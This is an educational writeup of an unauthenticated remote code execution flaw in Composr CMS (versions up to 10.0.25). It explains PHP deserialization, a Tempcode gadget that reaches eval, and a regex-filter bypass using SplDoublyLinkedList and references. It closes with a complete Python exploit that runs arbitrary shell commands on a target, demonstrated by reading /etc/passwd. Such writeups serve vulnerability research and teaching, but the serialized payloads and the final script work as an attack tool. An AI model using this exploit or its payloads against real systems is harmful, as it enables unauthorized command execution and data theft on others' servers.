Composr CMS Remote Code Execution

Composr CMS suffers from a remote code execution vulnerability that can be triggered without authentication. The vulnerability arises because of insufficient validation of user-supplied data that is passed to unserialize in /sources/ajax.php. Versions up to and including 10.0.25 are vulnerable.

This document is an informal writeup that explains the full process of finding and exploiting the vulnerability, including all failed attempts. It was written to give people who are not acquainted with the details of PHP exploitation an understanding of non-trivial deserialization exploits.

Finding dangerous functions

PHP exploitation relies heavily on "dangerous" functions. These are functions that can have unwanted side-effects if called with user-supplied data as arguments. The most well-known of these are eval, system and unserialize.

Finding dangerous functions is very easy. In the case of Composr CMS, grepping for unserialize finds it in several places. Before going on to the next step, we should quickly make sure that these calls can be reached without authentication.

Deserialization exploits

Now might be a good time to explain why unserialize is dangerous. serialize allows a programmer to take an (almost) arbitrary PHP value and turn it into a serialized string. For now it is unimportant how that string is built; we will look at the actual serialization mechanism later. This string can then, for example, be stored in a database or transmitted to a user. When unserialize is later called on this string, it recreates the original PHP value. The following PHP code demonstrates this:

class User {
    public $name;
    public $id;

    function __construct($name, $id) {
        $this->name = $name;
        $this->id = $id;
    }
}

$value = [new User('Franz', 1), ['hello', 'world', 0]];
$serialized = serialize($value);
echo $serialized;
// a:2:{i:0;O:4:"User":2:{s:4:"name";s:5:"Franz";s:2:"id";i:1;}i:1;a:3:{i:0;s:5:"hello";i:1;s:5:"world";i:2;i:0;}}


// do something here


$unserialized = unserialize($serialized);
var_dump($unserialized);
/*
array(2) {
  [0]=>
  object(User)#2 (2) {
    ["name"]=>
    string(5) "Franz"
    ["id"]=>
    int(1)
  }
  [1]=>
  array(3) {
    [0]=>
    string(5) "hello"
    [1]=>
    string(5) "world"
    [2]=>
    int(0)
  }
}
*/

There are two big reasons why deserializing a user-supplied string is a bad idea:

Firstly, you don't have any control over the structure of the deserialized value. Code that uses unserialize often assumes that the return value has a particular structure, for example that it is an array of integers. When the string being deserialized is chosen by an attacker, this assumption can be violated: unserialize gives attackers full control over not only the deserialized value but also its type.

Secondly, and far more dangerously, unserialize can instantiate objects of any class that is declared (or can be autoloaded) at the time of the unserialize call. PHP objects can have special "magic" methods. Magic methods are in most cases not called explicitly by the programmer, but implicitly by PHP itself. A quick overview of the most important magic methods:

method	called when
`__destruct`	object is destroyed (no references to it remain, or the script ends)
`__wakeup`	object is deserialized
`__sleep`	object is serialized
`__toString`	object is used in a context where PHP implicitly converts it into a string
`__invoke`	object is used as if it were a function

The following code shows how this can be exploited:

class Cache {
    public $file;
    public $data;

    function __construct($file) {
        $this->file = $file;
        $this->data = "";
    }

    function addData($data) {
        $this->data .= "\n" . $data;
    }

    function __destruct() {
        // quickly save the data!
        file_put_contents($this->file, $this->data);
    }
}

$user = unserialize($_COOKIE['user']);

Attackers can exploit this code to write arbitrary data to an arbitrary file. They do this by serializing a Cache object with file and data set to values of their choosing. unserialize then instantiates this Cache object, and its __destruct method runs when the script finishes executing.

We can now look at Composr CMS again and see if we can find some classes with useful magic methods.

Finding useful magic methods

Modern PHP applications often feature many classes that have useful magic methods. PHPGGC is a project that collects classes with interesting magic methods from widespread libraries. It also contains code to automatically generate exploit code.

Composr CMS, however, doesn't use any popular library, so we have to find magic methods ourselves. Grepping for __destruct and __wakeup doesn't find anything useful. The Tempcode class in /sources/tempcode.php, however, has a very interesting __toString method:

class Tempcode {

    // ...

    public function __toString() {
        return $this->evaluate();
    }

    // ...

    public function evaluate($current_lang = null) {
        $tpl_funcs = $KEEP_TPL_FUNCS;
        foreach ($this->seq_parts as $seq_parts_group) {
            foreach ($seq_parts_group as $seq_part) {
                $seq_part_0 = $seq_part[0];

                if (!isset($tpl_funcs[$seq_part_0])) {
                    eval($this->code_to_preexecute[$seq_part_0]);
                }
            }
        }
    }

    // ...
}

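This is a textbook unserialize gadget, and it is super easy to use, too: seq_parts and code_to_preexecute are plain properties, so whoever supplies the serialized object decides which string reaches eval. Simply create a serialized Tempcode object in the following manner: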

class Tempcode {

}

$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";
echo serialize($tp);
/*
O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}
*/

If we can get Composr CMS to unserialize this string and the resulting object gets (unintentionally) used in a context where the __toString method will be called, we can achieve command execution.

A deeper look at Composr CMS

We will focus on the ajax_tree_script function in /sources/ajax.php. This function will run when you access http://example.org/data/ajax_tree.php. It is one of the functions that calls unserialize on user input without authentication. It starts by quickly checking if the site is in maintenance mode:

function ajax_tree_script()
{
    $site_closed = get_option('site_closed');
    if (($site_closed == '1') && (!has_privilege(get_member(), 'access_closed_site')) && (!$GLOBALS['IS_ACTUALLY_ADMIN'])) {
        header('Content-type: text/plain; charset=' . get_charset());
        @exit(get_option('closed'));
    }

Then sets some ajax stuff up:

    prepare_for_known_ajax_response();

    require_code('xml');
    header('Content-Type: text/xml');

Loads a hook object that will later run a few database queries and generate the response:

    $hook = filter_naughty_harsh(get_param_string('hook'));
    require_code('hooks/systems/ajax_tree/' . $hook, true);
    $object = object_factory('Hook_' . $hook, true);
    if ($object === null) {
        warn_exit(do_lang_tempcode('INTERNAL_ERROR'));
    }

Gets some further options and outputs the beginning of the response:

    $id = get_param_string('id', '', true);
    if ($id == '') {
        $id = null;
    }
    safe_ini_set('ocproducts.xss_detect', '0');
    $html_mask = get_param_integer('html_mask', 0) == 1;
    if (!$html_mask) {
        echo '<?xml version="1.0" encoding="' . get_charset() . '"?' . '>';
    }
    echo($html_mask ? '<html>' : '<request>');

Unserializes user-supplied data ($_GET['options'] in this case) and stores it in the $options variable:

    $_options = get_param_string('options', '', true);
    if ($_options == '') {
        $_options = serialize(array());
    }
    secure_serialized_data($_options); // Ignore this (for now)

    $options = @unserialize($_options);

    if ($options === false) {
        warn_exit(do_lang_tempcode('INTERNAL_ERROR'));
    }

And finally calls the run method on the loaded hook object and passes our unserialized input in:

    $val = $object->run($id, $options, get_param_string('default', null, true));
    echo str_replace('</body>', '<br id="ended" /></body>', $val);
    echo($html_mask ? '</html>' : '</request>');

    exit();
}

Reading the code, we see that we control which hook object is loaded (via the $_GET['hook'] parameter) and, of course, that we have full control over the $options value. All of the hook objects we could use here work basically the same way. We'll go with the Hook_choose_catalogue_entry class. Here is its run method:

    public function run($id, $options, $default = null)
    {
        require_code('catalogues');

        $only_owned = array_key_exists('only_owned', $options) ? (is_null($options['only_owned']) ? null : intval($options['only_owned'])) : null;
        $catalogue_name = array_key_exists('catalogue_name', $options) ? $options['catalogue_name'] : null;
        $editable_filter = array_key_exists('editable_filter', $options) ? ($options['editable_filter']) : false;
        $tree = get_catalogue_entries_tree($catalogue_name, $only_owned, is_null($id) ? null : intval($id), null, null, is_null($id) ? 0 : 1, $editable_filter);

        /* The rest from here on is unimportant */

This code assumes that $options is an array containing strings and integers. It tries to get a few values out of the array and passes them to a function called get_catalogue_entries_tree. This function then executes a SQL query containing the $catalogue_name value, thereby implicitly converting it to a string! This means that we have found a way to get the script to call the __toString method on our deserialized object! The only thing left to do is to build the exploit.

Building an exploit

The URL we have to access is http://example.org/data/ajax_tree.php. To use the Hook_choose_catalogue_entry class, we need to set the hook parameter to choose_catalogue_entry. Now we need to build the serialized options parameter. It should be an array that contains our Tempcode gadget. Let's fire up PHP to generate it:

class Tempcode {

}

$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";


$options = ['catalogue_name' => $tp];
echo serialize($options);
/*
a:1:{s:14:"catalogue_name";O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}
*/

Our exploit then looks like this:

#!/usr/bin/env python3
import requests

def exploit(base_url):
    payload = {'hook': 'choose_catalogue_entry',
               'options': 'a:1:{s:14:"catalogue_name";O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}'}
    return requests.get("{}/data/ajax_tree.php".format(base_url), params=payload)

exploit('http://example.org')

Let's execute it and have a look at the output:

$ python3 composr_exploit.py
<?xml version="1.0" encoding="utf-8"?><request>
<!DOCTYPE html>

<html lang="en" dir="ltr">
        <head>
...

Well, that doesn't look like ls at all...

Finding the problem

What we got back was an HTML document telling us that a PHP warning has been raised and that execution has been stopped. The error message says something about array_key_exists expecting an array and not getting one. array_key_exists didn't get our deserialized array because our serialized string has been tampered with! Directly before the call to unserialize, another function is called that (supposedly) checks the serialized string for dangerous objects: secure_serialized_data. It is defined in /sources/global3.php and we will soon take a look at what exactly it does.

If you plan on exploiting deserialization vulnerabilities, this is a situation you will probably find yourself in more than once. Don't worry: the serialization mechanism PHP uses is quite complicated and many of these handcrafted validation routines are easy to outsmart. To do this, we should first familiarize ourselves with the PHP serialization mechanism.

PHP's serialization mechanism

This is how basic types get serialized:

type	serialized	example
null	`N;`	`N;`
boolean	`b:<boolean as integer>;`	`b:1;`
integer	`i:<number>;`	`i:5;`
string	`s:<length in bytes>:"<string>";`	`s:5:"hello";`
float	`d:<float>;`	`d:5.4;`

Note that strings are not escaped when they are serialized; the length prefix alone tells unserialize where the string ends. So She said "hello" to me is serialized to s:22:"She said "hello" to me";.

Now for the more complex types: Arrays get serialized to a:<number of elements>:{<list of elements>} where the <list of elements> is just a list of all serialized <key><element>-pairs. [0 => "a", 1 => "b", 2 => "c"] is therefore serialized to a:3:{i:0;s:1:"a";i:1;s:1:"b";i:2;s:1:"c";}.

Finally, objects get serialized to O:<number of characters in the class name>:"<class name>":<number of class members>:{<list of class members>}, where <list of class members> is serialized just like array elements (except, of course, that the keys must be strings here). Here is an example:

class HelloWorld {
    public $a;
    public $b;
}

$hello = new HelloWorld();

$hello->a = "a";
$hello->b = 1;

echo serialize($hello);
// O:10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}
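
The rules for scalars and arrays are small enough to re-implement, which is a handy way to check your understanding of them. Below is a minimal sketch in Python (the language the exploit scripts in this writeup use). php_serialize is a hypothetical helper, not part of PHP or Composr, and it only covers the types from the table plus arrays; objects are left out, and float formatting may differ from PHP depending on its precision settings.

```python
def php_serialize(value):
    """Serialize a small subset of Python values in PHP's serialize() format."""
    if value is None:
        return "N;"
    if isinstance(value, bool):  # must come before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value!r};"
    if isinstance(value, str):
        # The length prefix counts bytes, and the content is not escaped.
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, (list, tuple)):
        value = dict(enumerate(value))  # a PHP list is an array keyed 0..n-1
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type: {type(value).__name__}")


print(php_serialize('She said "hello" to me'))  # s:22:"She said "hello" to me";
print(php_serialize(["a", "b", "c"]))           # a:3:{i:0;s:1:"a";i:1;s:1:"b";i:2;s:1:"c";}
```

Both printed lines match the serialized strings quoted in the text above.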

Now that we know about the basic structure of serialized strings, we can take a look at the secure_serialized_data function that currently blocks our attempt to gain code execution.

The validation function

// Cleaned up so it's easier to read
function secure_serialized_data(&$serialized_data)
{
    $matches = array();
    $num_matches = preg_match_all('#(^|;)O:\d+:"([^"]+)"#', $serialized_data, $matches);
    for ($i = 0; $i < $num_matches; $i++) {

        $methods = get_class_methods($matches[2][$i]);

        foreach ($methods as $method) {
            if (preg_match('#^__.*$#', $method) != 0) {
                $serialized_data = serialize(null);
                return;
            }
        }
    }
}

This function takes our serialized string and uses a regex to search for occurrences of O:<some number here>:"<class name>". It then takes whatever string was at <class name>, calls get_class_methods on it and iterates over the class methods. If one of these methods is a magic method, it replaces our $serialized_data string with a harmless one (a serialized null).
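
To see which class names the check actually looks at, the regex can be tried out on its own. The following is a rough Python port of just the matching step. names_seen_by_filter is a made-up name, and the get_class_methods lookup is PHP-specific and left out. Python's re module should treat this particular pattern the same way PCRE does, but that is an assumption worth double-checking against a real PHP installation.

```python
import re

# Same pattern as in secure_serialized_data. re.ASCII keeps \d limited to 0-9.
OBJECT_PATTERN = re.compile(r'(^|;)O:\d+:"([^"]+)"', re.ASCII)


def names_seen_by_filter(serialized):
    """Return the class names the regex would hand to get_class_methods."""
    return [match.group(2) for match in OBJECT_PATTERN.finditer(serialized)]


# An object at the top level is found via the ^ alternative ...
print(names_seen_by_filter('O:10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}'))
# ['HelloWorld']

# ... and an object used as an array value via the ; that ends its key.
print(names_seen_by_filter('a:1:{s:14:"catalogue_name";O:8:"Tempcode":0:{}}'))
# ['Tempcode']
```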

Bypassing the validation function

It turns out that PHP's serialization language is context-sensitive (you could actually argue that it's a type-0 grammar), whereas a regex can only recognize regular languages. This means that there have to be inputs that the regex and PHP's unserialize understand differently. These disagreements are called parser differentials. Our goal now is to find an input that exploits a parser differential in order to bypass the regex check.
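
A quick way to see such a disagreement without attacking anything: put text that merely looks like an object inside a string. A reader that honors the length prefix skips the string as a whole, while the regex happily scans its contents. The sketch below is a hypothetical length-aware walker in Python (class_names is not a PHP or Composr function) that only knows the tags of the serialization format discussed in this writeup.

```python
import re

OBJECT_PATTERN = re.compile(r'(^|;)O:\d+:"([^"]+)"', re.ASCII)


def class_names(serialized):
    """Walk PHP-serialized data and list the class names it really declares."""
    buf = serialized.encode("utf-8")  # length prefixes count bytes
    found = []

    def expect(pos, token):
        if buf[pos:pos + len(token)] != token:
            raise ValueError(f"expected {token!r} at offset {pos}")
        return pos + len(token)

    def number(pos, stop):
        end = buf.index(stop, pos)
        digits = buf[pos:end]
        if not digits.isdigit():  # no sign, no whitespace
            raise ValueError(f"bad number at offset {pos}")
        return int(digits), end + len(stop)

    def quoted(pos, length):
        # Trust the declared length, not the quote characters inside.
        start = expect(pos, b'"')
        end = expect(start + length, b'"')
        return buf[start:start + length], end

    def value(pos):
        tag = buf[pos:pos + 2]
        if tag == b"N;":
            return pos + 2
        if tag in (b"b:", b"i:", b"d:", b"r:", b"R:"):
            return buf.index(b";", pos) + 1
        if tag == b"s:":
            length, pos = number(pos + 2, b":")
            _, pos = quoted(pos, length)
            return expect(pos, b";")
        if tag == b"a:":
            count, pos = number(pos + 2, b":{")
            for _ in range(2 * count):  # each element is a key plus a value
                pos = value(pos)
            return expect(pos, b"}")
        if tag in (b"O:", b"C:"):
            length, pos = number(pos + 2, b":")
            name, pos = quoted(pos, length)
            found.append(name.decode("utf-8"))
            size, pos = number(expect(pos, b":"), b":{")
            if tag == b"O:":
                for _ in range(2 * size):  # property name plus value
                    pos = value(pos)
            else:
                pos += size  # custom payload: opaque without class knowledge
            return expect(pos, b"}")
        raise ValueError(f"unknown tag {tag!r} at offset {pos}")

    value(0)
    return found


# An array holding one plain string whose text looks like an object header.
data = 'a:1:{i:0;s:16:"x;O:8:"Tempcode"";}'
print([m.group(2) for m in OBJECT_PATTERN.finditer(data)])  # ['Tempcode']
print(class_names(data))                                    # []
```

Here the disagreement is harmless (a false alarm). Note also that the walker has to treat the body of a C: entry as opaque, because only the class itself knows how to parse it, so even a careful generic validator cannot see what is nested in there.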

The lame way that used to work

unserialize used to allow a superfluous + in some places:

O:+10:"HelloWorld":2:{s:1:"a";s:1:"a";s:1:"b";i:1;}
  ^

This makes it possible to completely bypass secure_serialized_data. It has one drawback though: It doesn't work for PHP 7.2 anymore.

The cool LangSec way that almost works

Well, we can serialize arbitrary strings. Having a little fun with that poor regex is almost obligatory:

class HelloWorld {

}

$serialized_data = serialize([";O:2:" => new HelloWorld()]);
echo $serialized_data;
// a:1:{s:5:";O:2:";O:10:"HelloWorld":0:{}}
//           ^           ^
// match   begin        end
//
// And since subsequent matches are continued from
// the end of the last match no further match is found

$matches = array();
$num_matches = preg_match_all('#(^|;)O:\d+:"([^"]+)"#', $serialized_data, $matches);
for ($i = 0; $i < $num_matches; $i++) {
    echo $matches[2][$i];
}

The regex now parses ;O:10: as the class name of an object and, more importantly, it doesn't find our HelloWorld object anymore! This is a classic parser differential: regular expressions are just not powerful enough to parse strings produced by PHP's serialization mechanism. Sadly, it's of no use to us, because secure_serialized_data goes on to call get_class_methods on ;O:10:, which returns null. The following foreach then tries to iterate over null, which raises a warning and halts execution. What stops us here is the (admittedly good) security practice of stopping execution on PHP warnings.

The moderately cool way that works!

Now, we want this to work for PHP 7.2 and we're kinda getting desperate. Luckily, it turns out that the serialization format has some features we haven't talked about yet:

Objects that implement the Serializable interface
References

Classes that implement the Serializable interface provide two methods, serialize and unserialize. When such an object is serialized, a string of the following format is returned: C:<number of characters in the class name>:"<class name>":<length of the output of the serialize method>:{<output of the serialize method>}. Creating a serialized string in this format for an object of a class that doesn't implement Serializable will work, but the deserialized object will not have any class members set. It is thus not very useful for our purposes, but it does lead the way to a final working exploit.

There are a few PHP classes implementing Serializable, the most important of which (for our purposes here) is SplDoublyLinkedList. This is the important part of the C code that handles serialization for SplDoublyLinkedList:

    /* flags */
    ZVAL_LONG(&flags, intern->flags);
    php_var_serialize(&buf, &flags, &var_hash);

    /* elements */
    while (current) {
        smart_str_appendc(&buf, ':');
        next = current->next;

        php_var_serialize(&buf, &current->data, &var_hash);

        current = next;
    }

It shows that the elements of a SplDoublyLinkedList are serialized just like serialize would serialize them but they are separated by colons. This provides us with a way to bypass the regex:

class HelloWorld {

}

$dll = new SplDoublyLinkedList();
$dll->push(new HelloWorld());
$dll->push(42);

$serialized_data = serialize($dll);
echo $serialized_data;
// C:19:"SplDoublyLinkedList":33:{i:0;:O:10:"HelloWorld":0:{}:i:42;}
//                                    ^
//                    This prevents the regex from matching

Now this by itself isn't really helpful. SplDoublyLinkedList doesn't implement __toString, and although array operators work on it, keys have to be numeric, so $dll['catalogue_name'] doesn't work either. We can now get our gadget deserialized without triggering secure_serialized_data, but we need a new way to call __toString on it.

There is one last thing about the serialization format we haven't talked about: It allows references. If you serialize the same object (not just a copy) twice, the object won't be serialized two times. Instead serialize will just store a reference. Here's a quick example:

class HelloWorld {

}

$a = new HelloWorld();

$serialized_data = serialize([$a, $a]);
echo $serialized_data;
// a:2:{i:0;O:10:"HelloWorld":0:{}i:1;r:2;}
//                                    ^
//                           This is the reference
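
Where does the 2 in r:2 come from? As far as the examples in this writeup show, every serialized value (keys excluded) takes the next slot number, starting at 1 for the outermost value, and r:<n> points back at slot n. Below is a small Python sketch of that bookkeeping, assuming exactly this numbering rule. PhpObject and serialize_with_refs are hypothetical stand-ins, and only ints, strings, lists and objects are handled.

```python
class PhpObject:
    """Stand-in for a PHP object: a class name plus public properties."""

    def __init__(self, class_name, **props):
        self.class_name = class_name
        self.props = props


def serialize_with_refs(root):
    slots = {}   # id(object) -> slot number of its first occurrence
    counter = 0  # every serialized value (not key) takes the next slot

    def scalar(v):
        if isinstance(v, int):
            return f"i:{v};"
        return f's:{len(v.encode("utf-8"))}:"{v}";'

    def emit(v):
        nonlocal counter
        counter += 1
        if isinstance(v, PhpObject):
            if id(v) in slots:
                return f"r:{slots[id(v)]};"  # seen before: point at its slot
            slots[id(v)] = counter
            body = "".join(scalar(k) + emit(p) for k, p in v.props.items())
            name = v.class_name
            return f'O:{len(name)}:"{name}":{len(v.props)}:{{{body}}}'
        if isinstance(v, list):
            body = "".join(scalar(i) + emit(x) for i, x in enumerate(v))
            return f"a:{len(v)}:{{{body}}}"
        if isinstance(v, (int, str)):
            return scalar(v)
        raise TypeError(f"unsupported type: {type(v).__name__}")

    return emit(root)


a = PhpObject("HelloWorld")
print(serialize_with_refs([a, a]))     # a:2:{i:0;O:10:"HelloWorld":0:{}i:1;r:2;}
print(serialize_with_refs([7, a, a]))  # a:3:{i:0;i:7;i:1;O:10:"HelloWorld":0:{}i:2;r:3;}
```

In the first call the array itself is slot 1 and the object is slot 2, hence r:2. In the second call the integer 7 takes slot 2 and pushes the object to slot 3.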

We can now use this to build a new exploit that bypasses secure_serialized_data but still executes our code:

class Tempcode {

}

$tp = new Tempcode();
$tp->seq_parts = [[["somestring"]]];
$tp->code_to_preexecute["somestring"] = "system(\"ls\");exit();";

$dll = new SplDoublyLinkedList();
$dll->push($tp);

$options = [0 => $dll, 'catalogue_name' => $tp];
echo serialize($options);
/*
a:2:{i:0;C:19:"SplDoublyLinkedList":166:{i:0;:O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:10:"somestring";}}}s:18:"code_to_preexecute";a:1:{s:10:"somestring";s:20:"system("ls");exit();";}}}s:14:"catalogue_name";r:4;}
*/

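This exploit uses a bit of trickery: the malicious Tempcode object is stored in the SplDoublyLinkedList to evade detection by the regex, while a reference to the same object sits outside of the list under the key catalogue_name. That reference is the r:4 at the end, which points at the fourth value in the stream: the outer array, the list, the list's flags integer and then the Tempcode object. This lets us use the discovered vulnerability, where __toString is called on the array element with the key catalogue_name!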

The final exploit

Here is the final exploit:

#!/usr/bin/env python3
import requests
import argparse

def exploit(base_url, cmd):
    payload = {'hook': 'choose_catalogue_entry', 'cmd': cmd, 'options': 'a:2:{i:0;C:19:"SplDoublyLinkedList":152:{i:0;:O:8:"Tempcode":2:{s:9:"seq_parts";a:1:{i:0;a:1:{i:0;a:1:{i:0;s:0:"";}}}s:18:"code_to_preexecute";a:1:{s:0:"";s:28:"system($_GET["cmd"]);exit();";}}}s:14:"catalogue_name";r:4;}'}
    return requests.get("{}/data/ajax_tree.php".format(base_url), params=payload).text[47:]

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Remote code execution on composr cms')
    parser.add_argument('url', help='base url of the composr installation')
    parser.add_argument('cmd', help='command to execute')

    args = parser.parse_args()

    print(exploit(args.url, args.cmd))

And one final test:

$ python3 composr_exploit.py http://localhost "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
...
